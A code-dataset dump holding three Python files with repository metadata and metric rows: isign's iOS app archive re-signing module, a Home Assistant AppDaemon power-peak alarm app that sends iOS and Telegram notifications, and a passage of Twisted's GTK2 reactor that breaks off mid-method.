#est.evalute(input_fn=lambda: input_func(eval_func_dict))
return est
| 31.731481
| 85
| 0.66443
| 463
| 3,427
| 4.688985
| 0.25054
| 0.051589
| 0.023952
| 0.033164
| 0.376785
| 0.361124
| 0.361124
| 0.330723
| 0.239521
| 0.239521
| 0
| 0.017202
| 0.23665
| 3,427
| 107
| 86
| 32.028037
| 0.812691
| 0.254158
| 0
| 0.218182
| 0
| 0
| 0.056718
| 0.019308
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036364
| false
| 0
| 0.109091
| 0
| 0.181818
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8681c3c33618ecd1ae623aef1502da24ff44d7f8
| 15,279
|
py
|
Python
|
isign/archive.py
|
l0ui3/isign
|
c0730ac1ce1b32defe8c6016e19b9701184b0f5a
|
[
"Apache-2.0"
] | 1
|
2020-03-24T14:22:17.000Z
|
2020-03-24T14:22:17.000Z
|
isign/archive.py
|
l0ui3/isign
|
c0730ac1ce1b32defe8c6016e19b9701184b0f5a
|
[
"Apache-2.0"
] | null | null | null |
isign/archive.py
|
l0ui3/isign
|
c0730ac1ce1b32defe8c6016e19b9701184b0f5a
|
[
"Apache-2.0"
] | 1
|
2021-08-16T04:03:25.000Z
|
2021-08-16T04:03:25.000Z
|
""" Represents an app archive. This is an app at rest, whether it's a naked
app bundle in a directory, or a zipped app bundle, or an IPA. We have a
common interface to extract these apps to a temp file, then resign them,
and create an archive of the same type """
import abc
import biplist
from bundle import App, Bundle, is_info_plist_native
from exceptions import MissingHelpers, NotSignable, NotMatched
from distutils import spawn
import logging
import os
from os.path import abspath, dirname, exists, isdir, isfile, join, normpath
import tempfile
import re
from subprocess import call
from signer import Signer
import shutil
import zipfile
REMOVE_WATCHKIT = True
helper_paths = {}
log = logging.getLogger(__name__)
def get_helper(helper_name):
""" find paths to executables. Cached in helper_paths """
if helper_name not in helper_paths or helper_paths[helper_name] is None:
# note, find_executable returns None is not found
# in other words, we keep retrying until found
helper_paths[helper_name] = spawn.find_executable(helper_name)
log.debug("got executable {} for {}".format(helper_paths[helper_name],
helper_name))
return helper_paths[helper_name]
def make_temp_dir():
return tempfile.mkdtemp(prefix="isign-")
def get_watchkit_paths(root_bundle_path):
""" collect sub-bundles of this bundle that have watchkit """
# typical structure:
#
# app_bundle
# ...
# some_directory
# watchkit_extension <-- this is the watchkit bundle
# Info.plist
# watchkit_bundle <-- this is the part that runs on the Watch
# Info.plist <-- WKWatchKitApp=True
#
watchkit_paths = []
for path, _, _ in os.walk(root_bundle_path):
if path == root_bundle_path:
continue
try:
bundle = Bundle(path)
except NotMatched:
# this directory is not a bundle
continue
if bundle.info.get('WKWatchKitApp') is True:
# get the *containing* bundle
watchkit_paths.append(dirname(path))
return watchkit_paths
def process_watchkit(root_bundle_path, should_remove=False):
""" Unfortunately, we currently can't sign WatchKit. If you don't
care about watchkit functionality, it is
generally harmless to remove it, so that's the default.
Remove when https://github.com/saucelabs/isign/issues/20 is fixed """
watchkit_paths = get_watchkit_paths(root_bundle_path)
if len(watchkit_paths) > 0:
if should_remove:
for path in watchkit_paths:
log.warning("Removing WatchKit bundle {}".format(path))
shutil.rmtree(path)
else:
raise NotSignable("Cannot yet sign WatchKit bundles")
class Archive(object):
__metaclass__ = abc.ABCMeta
# we use abc.abstractmethod throughout because there are certain class
# methods we want to ensure are implemented.
@abc.abstractmethod
def unarchive_to_temp(self):
""" Unarchive and copy to a temp directory """
pass
@abc.abstractmethod
def archive(cls, path, output_path):
""" Archive a directory to an output path """
pass
@abc.abstractmethod
def get_info(cls, path):
""" Obtain app metadata from Info.plist without unarchiving """
pass
@abc.abstractmethod
def precheck(cls, path):
""" Check if this is, in fact, an archive of this type """
pass
@abc.abstractmethod
def find_bundle_dir(cls, path):
""" Locate the directory of the main app (aka bundle) """
pass
class AppArchive(Archive):
""" The simplest form of archive -- a naked App Bundle, with no extra directory structure,
compression, etc """
@classmethod
def find_bundle_dir(cls, path):
""" Included for similarity with the zipped archive classes. In this case, the bundle dir
*is* the directory """
return path
@classmethod
def _get_plist_path(cls, path):
return join(cls.find_bundle_dir(path), "Info.plist")
@classmethod
def get_info(cls, path):
return biplist.readPlist(cls._get_plist_path(path))
@classmethod
def precheck(cls, path):
if not isdir(path):
return False
if not os.path.exists(cls._get_plist_path(path)):
return False
plist = cls.get_info(path)
is_native = is_info_plist_native(plist)
log.debug("is_native: {}".format(is_native))
return is_native
@classmethod
def archive(cls, path, output_path):
if exists(output_path):
shutil.rmtree(output_path)
shutil.move(path, output_path)
log.info("archived %s to %s" % (cls.__name__, output_path))
def __init__(self, path):
self.path = path
self.relative_bundle_dir = '.'
self.bundle_info = self.get_info(self.path)
def unarchive_to_temp(self):
containing_dir = make_temp_dir()
log.debug("unarchiving to temp... %s -> %s", self.path, containing_dir)
shutil.rmtree(containing_dir) # quirk of copytree, top dir can't exist already
shutil.copytree(self.path, containing_dir)
process_watchkit(containing_dir, REMOVE_WATCHKIT)
return UncompressedArchive(containing_dir, '.', self.__class__)
class AppZipArchive(Archive):
""" Just like an app, except it's zipped up, and when repackaged,
should be re-zipped. """
app_dir_pattern = r'^([^/]+\.app/).*$'
extensions = ['.zip']
helpers = ['zip', 'unzip']
@classmethod
def is_helpers_present(cls):
""" returns False if any of our helper apps wasn't found in class init """
is_present = True
for helper_name in cls.helpers:
if get_helper(helper_name) is None:
log.error("missing helper for class {}: {}".format(cls.__name__, helper_name))
is_present = False
break
return is_present
@classmethod
def is_archive_extension_match(cls, path):
""" does this path have the right extension """
log.debug('extension match')
for extension in cls.extensions:
log.debug('extension match: %s', extension)
if path.endswith(extension):
return True
return False
@classmethod
def find_bundle_dir(cls, zipfile_obj):
relative_bundle_dir = None
apps = set()
file_list = zipfile_obj.namelist()
for file_name in file_list:
matched = re.match(cls.app_dir_pattern, file_name)
if matched:
apps.add(matched.group(1))
if len(apps) == 1:
log.debug("found one app")
relative_bundle_dir = apps.pop()
elif len(apps) > 1:
log.warning('more than one app found in archive')
else:
log.warning('no apps found in archive')
return relative_bundle_dir
@classmethod
def _get_plist_path(cls, relative_bundle_dir):
return join(relative_bundle_dir, "Info.plist")
@classmethod
def precheck(cls, path):
""" Checks if an archive looks like this kind of app. Have to examine
within the zipfile, b/c we don't want to make temp dirs just yet. This
recapitulates a very similar precheck in the Bundle class """
if not isfile(path):
return False
if not cls.is_helpers_present():
raise MissingHelpers("helpers not present")
is_native = False
log.debug('precheck')
log.debug('path: %s', path)
if (cls.is_archive_extension_match(path) and
zipfile.is_zipfile(path)):
log.debug("this is an archive, and a zipfile")
zipfile_obj = zipfile.ZipFile(path)
relative_bundle_dir = cls.find_bundle_dir(zipfile_obj)
if relative_bundle_dir is not None:
plist_path = cls._get_plist_path(relative_bundle_dir)
if plist_path not in zipfile_obj.namelist():
return False
plist = cls.get_info(relative_bundle_dir, zipfile_obj)
is_native = is_info_plist_native(plist)
log.debug("is_native: {}".format(is_native))
return is_native
@classmethod
def get_info(cls, relative_bundle_dir, zipfile_obj):
plist_path = cls._get_plist_path(relative_bundle_dir)
plist_bytes = zipfile_obj.read(plist_path)
return biplist.readPlistFromString(plist_bytes)
def __init__(self, path):
self.path = path
zipfile_obj = zipfile.ZipFile(path)
self.relative_bundle_dir = self.find_bundle_dir(zipfile_obj)
self.bundle_info = self.get_info(self.relative_bundle_dir,
zipfile_obj)
def unarchive_to_temp(self):
containing_dir = make_temp_dir()
call([get_helper('unzip'), "-qu", self.path, "-d", containing_dir])
app_dir = abspath(join(containing_dir, self.relative_bundle_dir))
process_watchkit(app_dir, REMOVE_WATCHKIT)
return UncompressedArchive(containing_dir, self.relative_bundle_dir, self.__class__)
@classmethod
def archive(cls, containing_dir, output_path):
""" archive this up into a zipfile. Note this is a classmethod, because
the caller will use us on a temp directory somewhere """
# the temp file is necessary because zip always adds ".zip" if it
# does not have an extension. But we want to respect the desired
# output_path's extension, which could be ".ipa" or who knows.
# So we move it to the output_path later.
#
# We also do a little dance with making another temp directory just
# to construct the zip file. This is the best way to ensure the an unused
# filename. Also, `zip` won't overwrite existing files, so this is safer.
temp_zip_dir = None
try:
# need to chdir and use relative paths, because zip is stupid
temp_zip_dir = tempfile.mkdtemp(prefix="isign-zip-")
temp_zip_file = join(temp_zip_dir, 'temp.zip')
call([get_helper('zip'), "-qr", temp_zip_file, "."], cwd=containing_dir)
shutil.move(temp_zip_file, output_path)
log.info("archived %s to %s" % (cls.__name__, output_path))
finally:
if temp_zip_dir is not None and isdir(temp_zip_dir):
shutil.rmtree(temp_zip_dir)
class IpaArchive(AppZipArchive):
""" IPA is Apple's standard for distributing apps. Much like an AppZip,
but slightly different paths """
extensions = ['.ipa']
app_dir_pattern = r'^(Payload/[^/]+\.app/).*$'
class UncompressedArchive(object):
""" This just keeps track of some state with an unzipped app archive and
how to re-zip it back up once re-signed. The bundle is located somewhere
inside the containing directory, but might be a few directories down, like in
a ContainingDir/Payload/something.app
This class is also useful if you have an app that's already unzipped and
you want to sign it. """
def __init__(self, path, relative_bundle_dir, archive_class):
""" Path is the "Containing dir", the dir at the root level of the unzipped archive
(or the dir itself, in the case of an AppArchive archive)
relative bundle dir is the dir containing the bundle, e.g. Payload/Foo.app
archive class is the kind of archive this was (Ipa, etc.) """
self.path = path
self.relative_bundle_dir = relative_bundle_dir
self.archive_class = archive_class
bundle_path = normpath(join(path, relative_bundle_dir))
self.bundle = App(bundle_path)
def archive(self, output_path):
""" Re-zip this back up, or simply copy it out, depending on what the
original archive class did """
self.archive_class.archive(self.path, output_path)
def clone(self, target_path):
""" Copy the uncompressed archive somewhere else, return initialized
UncompressedArchive """
shutil.copytree(self.path, target_path)
return self.__class__(target_path,
self.relative_bundle_dir,
self.archive_class)
def remove(self):
# the containing dir might be gone already b/c AppArchive simply moves
# it to the desired target when done
if exists(self.path) and isdir(self.path):
log.debug('removing ua: %s', self.path)
shutil.rmtree(self.path)
def archive_factory(path):
""" Guess what kind of archive we are dealing with, return an
archive object. Returns None if path did not match any archive type """
archive = None
for cls in [IpaArchive, AppZipArchive, AppArchive]:
if cls.precheck(path):
archive = cls(path)
log.debug("File %s matched as %s", path, cls.__name__)
break
return archive
def view(input_path):
if not exists(input_path):
raise IOError("{0} not found".format(input_path))
ua = None
bundle_info = None
try:
archive = archive_factory(input_path)
if archive is None:
raise NotMatched('No matching archive type found')
ua = archive.unarchive_to_temp()
bundle_info = ua.bundle.info
finally:
if ua is not None:
ua.remove()
return bundle_info
def resign(input_path,
certificate,
key,
apple_cert,
provisioning_profile,
output_path,
info_props=None,
alternate_entitlements_path=None):
""" Unified interface to extract any kind of archive from
a temporary file, resign it with these credentials,
and create a similar archive for that resigned app """
if not exists(input_path):
raise IOError("{0} not found".format(input_path))
log.debug('Signing with apple_cert: {}'.format(apple_cert))
log.debug('Signing with key: {}'.format(key))
log.debug('Signing with certificate: {}'.format(certificate))
log.debug('Signing with provisioning_profile: {}'.format(provisioning_profile))
signer = Signer(signer_cert_file=certificate,
signer_key_file=key,
apple_cert_file=apple_cert)
ua = None
bundle_info = None
try:
archive = archive_factory(input_path)
if archive is None:
raise NotSignable('No matching archive type found')
ua = archive.unarchive_to_temp()
if info_props:
# Override info.plist props of the parent bundle
ua.bundle.update_info_props(info_props)
ua.bundle.resign(signer, provisioning_profile, alternate_entitlements_path)
bundle_info = ua.bundle.info
ua.archive(output_path)
except NotSignable as e:
msg = "Not signable: <{0}>: {1}\n".format(input_path, e)
log.info(msg)
raise
finally:
if ua is not None:
ua.remove()
return bundle_info
| 37.540541
| 97
| 0.638458
| 1,978
| 15,279
| 4.749747
| 0.189585
| 0.027781
| 0.039808
| 0.015647
| 0.22363
| 0.173922
| 0.124747
| 0.107078
| 0.094518
| 0.08579
| 0
| 0.000906
| 0.277243
| 15,279
| 406
| 98
| 37.633005
| 0.84986
| 0.258328
| 0
| 0.340659
| 0
| 0
| 0.070612
| 0.004207
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117216
| false
| 0.018315
| 0.051282
| 0.014652
| 0.296703
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86852eaa353d7f71b07181e8c40327dffa81fc7f
| 12,985
|
py
|
Python
|
config/appdaemon/apps/power_alarm.py
|
azogue/hassio_config
|
591f158794c173d6391179ab2f52348d58c49aad
|
[
"MIT"
] | 18
|
2018-07-22T15:19:20.000Z
|
2022-01-09T20:57:43.000Z
|
config/appdaemon/apps/power_alarm.py
|
azogue/hassio_config
|
591f158794c173d6391179ab2f52348d58c49aad
|
[
"MIT"
] | 1
|
2020-04-30T08:33:36.000Z
|
2020-05-03T08:25:00.000Z
|
config/appdaemon/apps/power_alarm.py
|
azogue/hassio_config
|
591f158794c173d6391179ab2f52348d58c49aad
|
[
"MIT"
] | 8
|
2018-07-21T09:29:53.000Z
|
2021-11-10T19:06:32.000Z
|
# -*- coding: utf-8 -*-
"""
Automation task as a AppDaemon App for Home Assistant -
current meter PEAK POWER notifications
"""
import datetime as dt
from enum import IntEnum
import appdaemon.plugins.hass.hassapi as hass
LOG_LEVEL = "INFO"
LOG_LEVEL_ALERT = "WARNING"
LOGGER = "special_event_log"
COEF_CRITICAL_LIMIT = 1.1 # 10% over limit
MIN_TIME_TURN_OFF_AC = 60 # secs
# Big power consumers
BIG_CONSUMER_1_CLIMATE = "switch.ac_dry_contact"
BIG_CONSUMER_1_LABEL = "aire acondicionado"
BIG_CONSUMER_2 = "switch.calentador"
BIG_CONSUMER_2_LABEL = "calentador"
_IOS_SOUND_POWER_PEAK = "US-EN-Morgan-Freeman-Vacate-The-Premises.wav"
class TypeNotif(IntEnum):
"""
Handler for different kinds of power notifications.
Used to centralize push message construction.
"""
ALERT_OFF = 0
ALERT_ON = 1
ALERT_CRITICAL = 2
def make_ios_push_data(self, data_msg: dict) -> dict:
if self.value == self.ALERT_CRITICAL:
push_data = {
"category": "powerpeak",
"badge": 10,
"sound": _IOS_SOUND_POWER_PEAK,
"critical": 1,
"volume": 1.0,
"thread-id": "power-peak-group",
}
elif self.value == self.ALERT_ON:
push_data = {
"category": "powerpeak",
"thread-id": "power-peak-group",
"badge": 1,
"critical": 1,
"sound": _IOS_SOUND_POWER_PEAK,
}
else:
push_data = {
"category": "confirm",
"thread-id": "power-peak-group",
"sound": _IOS_SOUND_POWER_PEAK,
"badge": 0,
}
data_msg["data"] = {"push": push_data}
return data_msg
def make_telegram_push_data(self, data_msg: dict, target: int) -> dict:
data_msg["target"] = target
data_msg["disable_notification"] = self.value == self.ALERT_OFF
data_msg["inline_keyboard"] = [
[("Luces ON", "/luceson"), ("Luces OFF", "/lucesoff")],
[
("Potencia eléctrica", "/enerpi"),
("Grafs. enerPI", "/enerpitiles"),
],
[
(
"Calentador OFF",
"/service_call switch/turn_off switch.calentador",
),
(
"AC OFF",
"/service_call switch/turn_off switch.ac_dry_contact",
),
],
]
return data_msg
def make_notification_message(
self,
current_peak,
last_trigger,
alarm_start,
devices_off="",
pow_instant=0.0,
pow_sustained=0.0,
) -> dict:
if self.value == self.ALERT_CRITICAL:
return {
"title": "¡El automático está a punto de saltar!",
"message": (
f"Apagando {devices_off} para intentar evitar "
"la sobrecarga eléctrica."
),
}
time_now = (
"{:%H:%M:%S}".format(last_trigger)
if last_trigger is not None
else "???"
)
if self.value == self.ALERT_ON:
data_msg = {
"title": "Alto consumo eléctrico!",
"message": (
f"Peak: {current_peak} W en {time_now}. "
f"Ahora {pow_instant} W ({pow_sustained} sostenidos)"
),
}
data_msg["message"] = data_msg["message"].format(
current_peak, time_now, pow_instant, pow_sustained
)
else:
duration_min = (
dt.datetime.now() - alarm_start
).total_seconds() / 60.0
data_msg = {
"title": "Consumo eléctrico: Normal",
"message": (
f"Potencia normal desde {time_now}, "
f"Pico de potencia: {current_peak} W. "
f"Alerta iniciada hace {duration_min:.1f} min."
),
}
return data_msg
# noinspection PyClassHasNoInit
class PeakNotifier(hass.Hass):
"""
App to notify power peaks (when they are greater than a certain limit),
and after that, notify when back to normal (< lower limit).
"""
# Limit Values
_max_peak: float
_upper_limit: float
_lower_limit: float
_min_time_high: int
_min_time_low: int
# App user inputs
_main_power: str
_main_power_peak: str
_notifier: str
_target_sensor: str
_alarm_state: bool = False
_critical_alarm_state: bool = False
_last_trigger = None
_alarm_start = None
_turn_off_measure_taken = False
_current_peak = 0
def initialize(self):
"""AppDaemon required method for app init."""
self._main_power = self.args.get("sustained_power")
self._main_power_peak = self.args.get("instant_power")
self._notifier = self.config.get("notifier").replace(".", "/")
self._target_sensor = self.config.get("chatid_sensor")
# Power limits
self._upper_limit = float(self.args.get("max_power_kw")) * 1000.0
self._lower_limit = float(self.args.get("max_power_kw_reset")) * 1000.0
self._min_time_high = int(self.args.get("min_time_high"))
self._min_time_low = int(self.args.get("min_time_low"))
# TODO implement _max_peak over _instant_power
self._max_peak = float(self.args.get("max_power_peak_kw")) * 1000.0
# Listen for Main Power changes:
self.listen_state(self.main_power_change, self._main_power)
self.log(
f"PeakNotifier Initialized. P={self._main_power}, "
f"with P>{self._upper_limit} W for {self._min_time_high} secs, "
f"(low={self._lower_limit} W for {self._min_time_low} secs). "
f"Notify: {self._notifier}.",
level=LOG_LEVEL,
log=LOGGER,
)
def notify_alert(self, type_notif: TypeNotif, data: dict):
ios_alarm_msg = type_notif.make_ios_push_data(data.copy())
tlg_alarm_msg = type_notif.make_telegram_push_data(
data.copy(), target=int(self.get_state(self._target_sensor)),
)
self.call_service(self._notifier, **ios_alarm_msg)
self.call_service("telegram_bot/send_message", **tlg_alarm_msg)
# noinspection PyUnusedLocal
def peak_power_change(self, entity, attribute, old, new, kwargs):
"""Power Peak ALARM logic control."""
try:
new = int(float(new))
except ValueError:
return
# Update peak
if new > self._upper_limit and new > self._current_peak:
self._current_peak = new
# noinspection PyUnusedLocal
def main_power_change(self, entity, attribute, old, new, kwargs):
"""Sustained Power ALARM logic control."""
try:
new = int(float(new))
except ValueError:
return
now = dt.datetime.now()
if not self._alarm_state and (new > self._upper_limit):
if new > self._current_peak:
self._current_peak = new
# Pre-Alarm state, before trigger
if self._last_trigger is None:
# Start power peak event
self.log(
"New power peak event at {} with P={} W".format(now, new),
level=LOG_LEVEL,
log=LOGGER,
)
self._last_trigger = now
elif (
now - self._last_trigger
).total_seconds() > self._min_time_high:
# TRIGGER ALARM
self._alarm_start = now
self._turn_off_measure_taken = False
type_notif = TypeNotif.ALERT_ON
data = type_notif.make_notification_message(
self._current_peak,
self._last_trigger,
self._alarm_start,
pow_instant=self.get_state(self._main_power_peak),
pow_sustained=new,
)
self.log(
f"TRIGGER ALARM with msg={data}",
level=LOG_LEVEL_ALERT,
log=LOGGER,
)
self.notify_alert(type_notif, data)
self._alarm_state = True
self._critical_alarm_state = False
self._last_trigger = now
# else: # wait some more time
# (this is the same power peak event,
# waiting min time to trigger alarm)
# pass
elif self._alarm_state: # Alarm state, waiting for reset
if new > self._current_peak:
self._current_peak = new
if (
not self._turn_off_measure_taken
and new > self._upper_limit * COEF_CRITICAL_LIMIT
):
self.log(
"ENABLE CRITICAL ALARM with {} W".format(new),
level=LOG_LEVEL_ALERT,
log=LOGGER,
)
self._critical_alarm_state = True
elif new < self._lower_limit:
if (
now - self._last_trigger
).total_seconds() > self._min_time_low:
# RESET ALARM
type_notif = TypeNotif.ALERT_OFF
data = type_notif.make_notification_message(
self._current_peak,
self._last_trigger,
self._alarm_start,
)
self.log(
"RESET ALARM MODE at {}".format(now),
level=LOG_LEVEL,
log=LOGGER,
)
self.notify_alert(type_notif, data)
self._alarm_state = False
self._critical_alarm_state = False
self._last_trigger = None
self._alarm_start = None
self._turn_off_measure_taken = False
self._current_peak = 0
elif (
not self._turn_off_measure_taken
and self._critical_alarm_state
and new < self._upper_limit
):
self.log(
"DISABLE CRITICAL ALARM (now {} W)".format(new),
level=LOG_LEVEL_ALERT,
log=LOGGER,
)
self._critical_alarm_state = False
elif (
not self._turn_off_measure_taken
and self._critical_alarm_state
and (
(now - self._alarm_start).total_seconds()
> MIN_TIME_TURN_OFF_AC
)
):
# Turn off AC if AC + heater are ON
self._turn_off_measure_taken = True
self._critical_alarm_state = False
devices_turning_off = ""
if self.get_state(BIG_CONSUMER_1_CLIMATE) == "on":
devices_turning_off = BIG_CONSUMER_1_LABEL
self.call_service("climate/turn_off", entity_id="all")
elif self.get_state(BIG_CONSUMER_2) == "on":
devices_turning_off = BIG_CONSUMER_2_LABEL
self.call_service(
"switch/turn_off", entity_id=BIG_CONSUMER_2
)
if devices_turning_off:
# Notification of devices turned off
self.log(
f"CRITICAL ACTION: Turn off '{devices_turning_off}'",
level="ERROR",
log=LOGGER,
)
type_notif = TypeNotif.ALERT_CRITICAL
data = type_notif.make_notification_message(
self._current_peak,
self._last_trigger,
self._alarm_start,
devices_off=devices_turning_off,
pow_instant=self.get_state(self._main_power_peak),
pow_sustained=new,
)
self.notify_alert(type_notif, data)
self._last_trigger = now
else:
self._last_trigger = now
elif (self._last_trigger is not None) and (
(now - self._last_trigger).total_seconds() > self._min_time_low
):
# Normal operation, reset last trigger if no more in min_time_lower
self.log(
"RESET LAST TRIGGER (was in {})".format(self._last_trigger),
level=LOG_LEVEL,
log=LOGGER,
)
self._last_trigger = None
self._current_peak = 0
| 35.285326
| 79
| 0.5196
| 1,368
| 12,985
| 4.602339
| 0.190789
| 0.03669
| 0.035737
| 0.021125
| 0.394854
| 0.310515
| 0.254288
| 0.214263
| 0.16026
| 0.141677
| 0
| 0.006724
| 0.392992
| 12,985
| 367
| 80
| 35.381471
| 0.791931
| 0.082095
| 0
| 0.40411
| 0
| 0
| 0.1353
| 0.018677
| 0
| 0
| 0
| 0.002725
| 0
| 1
| 0.023973
| false
| 0
| 0.010274
| 0
| 0.123288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86857d42e426b63b37d2aa71caa37b9b57dd862e
| 13,391
|
py
|
Python
|
mailmynet/Maildir/proxy_postfix/Twisted-11.0.0/build/lib.linux-x86_64-2.6/twisted/internet/gtk2reactor.py
|
SPIN-UMass/SWEET
|
1b0f39222e7064f70812e3293ca023619295741d
|
[
"MIT"
] | 3
|
2020-04-02T06:23:44.000Z
|
2020-08-13T20:32:31.000Z
|
mailmynet/Maildir/proxy_postfix/Twisted-11.0.0/twisted/internet/gtk2reactor.py
|
SPIN-UMass/SWEET
|
1b0f39222e7064f70812e3293ca023619295741d
|
[
"MIT"
] | null | null | null |
mailmynet/Maildir/proxy_postfix/Twisted-11.0.0/twisted/internet/gtk2reactor.py
|
SPIN-UMass/SWEET
|
1b0f39222e7064f70812e3293ca023619295741d
|
[
"MIT"
] | 1
|
2020-04-02T06:26:10.000Z
|
2020-04-02T06:26:10.000Z
|
# -*- test-case-name: twisted.internet.test -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module provides support for Twisted to interact with the glib/gtk2
mainloop.
In order to use this support, simply do the following::
| from twisted.internet import gtk2reactor
| gtk2reactor.install()
Then use twisted.internet APIs as usual. The other methods here are not
intended to be called directly.
When installing the reactor, you can choose whether to use the glib
event loop or the GTK+ event loop which is based on it but adds GUI
integration.
"""
# System Imports
import sys, signal
from zope.interface import implements
try:
if not hasattr(sys, 'frozen'):
# Don't want to check this for py2exe
import pygtk
pygtk.require('2.0')
except (ImportError, AttributeError):
pass # maybe we're using pygtk before this hack existed.
import gobject
if hasattr(gobject, "threads_init"):
# recent versions of python-gtk expose this. python-gtk=2.4.1
# (wrapping glib-2.4.7) does. python-gtk=2.0.0 (wrapping
# glib-2.2.3) does not.
gobject.threads_init()
# Twisted Imports
from twisted.python import log, runtime, failure
from twisted.python.compat import set
from twisted.internet.interfaces import IReactorFDSet
from twisted.internet import main, base, posixbase, error, selectreactor
POLL_DISCONNECTED = gobject.IO_HUP | gobject.IO_ERR | gobject.IO_NVAL
# glib's iochannel sources won't tell us about any events that we haven't
# asked for, even if those events aren't sensible inputs to the poll()
# call.
INFLAGS = gobject.IO_IN | POLL_DISCONNECTED
OUTFLAGS = gobject.IO_OUT | POLL_DISCONNECTED
def _our_mainquit():
# XXX: gtk.main_quit() (which is used for crash()) raises an exception if
# gtk.main_level() == 0; however, all the tests freeze if we use this
# function to stop the reactor. what gives? (I believe this may have been
# a stupid mistake where I forgot to import gtk here... I will remove this
# comment if the tests pass)
import gtk
if gtk.main_level():
gtk.main_quit()
class Gtk2Reactor(posixbase.PosixReactorBase):
"""
GTK+-2 event loop reactor.
@ivar _sources: A dictionary mapping L{FileDescriptor} instances to gtk
watch handles.
@ivar _reads: A set of L{FileDescriptor} instances currently monitored for
reading.
@ivar _writes: A set of L{FileDescriptor} instances currently monitored for
writing.
@ivar _simtag: A gtk timeout handle for the next L{simulate} call.
"""
implements(IReactorFDSet)
def __init__(self, useGtk=True):
self._simtag = None
self._reads = set()
self._writes = set()
self._sources = {}
posixbase.PosixReactorBase.__init__(self)
# pre 2.3.91 the glib iteration and mainloop functions didn't release
# global interpreter lock, thus breaking thread and signal support.
if getattr(gobject, "pygtk_version", ()) >= (2, 3, 91) and not useGtk:
self.context = gobject.main_context_default()
self.__pending = self.context.pending
self.__iteration = self.context.iteration
self.loop = gobject.MainLoop()
self.__crash = self.loop.quit
self.__run = self.loop.run
else:
import gtk
self.__pending = gtk.events_pending
self.__iteration = gtk.main_iteration
self.__crash = _our_mainquit
self.__run = gtk.main
if runtime.platformType == 'posix':
def _handleSignals(self):
# Let the base class do its thing, but pygtk is probably
# going to stomp on us so go beyond that and set up some
# signal handling which pygtk won't mess with. This would
# be better done by letting this reactor select a
# different implementation of installHandler for
# _SIGCHLDWaker to use. Then, at least, we could fall
# back to our extension module. See #4286.
from twisted.internet.process import reapAllProcesses as _reapAllProcesses
base._SignalReactorMixin._handleSignals(self)
signal.signal(signal.SIGCHLD, lambda *a: self.callFromThread(_reapAllProcesses))
if getattr(signal, "siginterrupt", None) is not None:
signal.siginterrupt(signal.SIGCHLD, False)
# Like the base, reap processes now in case a process
# exited before the handlers above were installed.
_reapAllProcesses()
# The input_add function in pygtk1 checks for objects with a
# 'fileno' method and, if present, uses the result of that method
# as the input source. The pygtk2 input_add does not do this. The
# function below replicates the pygtk1 functionality.
# In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and
# g_io_add_watch() takes different condition bitfields than
# gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this
# bug.
def input_add(self, source, condition, callback):
if hasattr(source, 'fileno'):
# handle python objects
def wrapper(source, condition, real_s=source, real_cb=callback):
return real_cb(real_s, condition)
return gobject.io_add_watch(source.fileno(), condition, wrapper)
else:
return gobject.io_add_watch(source, condition, callback)
def _add(self, source, primary, other, primaryFlag, otherFlag):
"""
Add the given L{FileDescriptor} for monitoring either for reading or
writing. If the file is already monitored for the other operation, we
delete the previous registration and re-register it for both reading
and writing.
"""
if source in primary:
return
flags = primaryFlag
if source in other:
gobject.source_remove(self._sources[source])
flags |= otherFlag
self._sources[source] = self.input_add(source, flags, self.callback)
primary.add(source)
def addReader(self, reader):
"""
Add a L{FileDescriptor} for monitoring of data available to read.
"""
self._add(reader, self._reads, self._writes, INFLAGS, OUTFLAGS)
def addWriter(self, writer):
"""
Add a L{FileDescriptor} for monitoring ability to write data.
"""
self._add(writer, self._writes, self._reads, OUTFLAGS, INFLAGS)
def getReaders(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for reading.
"""
return list(self._reads)
def getWriters(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for writing.
"""
return list(self._writes)
def removeAll(self):
"""
Remove monitoring for all registered L{FileDescriptor}s.
"""
return self._removeAll(self._reads, self._writes)
def _remove(self, source, primary, other, flags):
"""
Remove monitoring the given L{FileDescriptor} for either reading or
writing. If it's still monitored for the other operation, we
re-register the L{FileDescriptor} for only that operation.
"""
if source not in primary:
return
gobject.source_remove(self._sources[source])
primary.remove(source)
if source in other:
self._sources[source] = self.input_add(
source, flags, self.callback)
else:
self._sources.pop(source)
def removeReader(self, reader):
"""
Stop monitoring the given L{FileDescriptor} for reading.
"""
self._remove(reader, self._reads, self._writes, OUTFLAGS)
def removeWriter(self, writer):
"""
Stop monitoring the given L{FileDescriptor} for writing.
"""
self._remove(writer, self._writes, self._reads, INFLAGS)
doIterationTimer = None
def doIterationTimeout(self, *args):
self.doIterationTimer = None
return 0 # auto-remove
def doIteration(self, delay):
# flush some pending events, return if there was something to do
# don't use the usual "while self.context.pending(): self.context.iteration()"
# idiom because lots of IO (in particular test_tcp's
# ProperlyCloseFilesTestCase) can keep us from ever exiting.
log.msg(channel='system', event='iteration', reactor=self)
if self.__pending():
self.__iteration(0)
return
# nothing to do, must delay
if delay == 0:
return # shouldn't delay, so just return
self.doIterationTimer = gobject.timeout_add(int(delay * 1000),
self.doIterationTimeout)
# This will either wake up from IO or from a timeout.
self.__iteration(1) # block
# note: with the .simulate timer below, delays > 0.1 will always be
# woken up by the .simulate timer
if self.doIterationTimer:
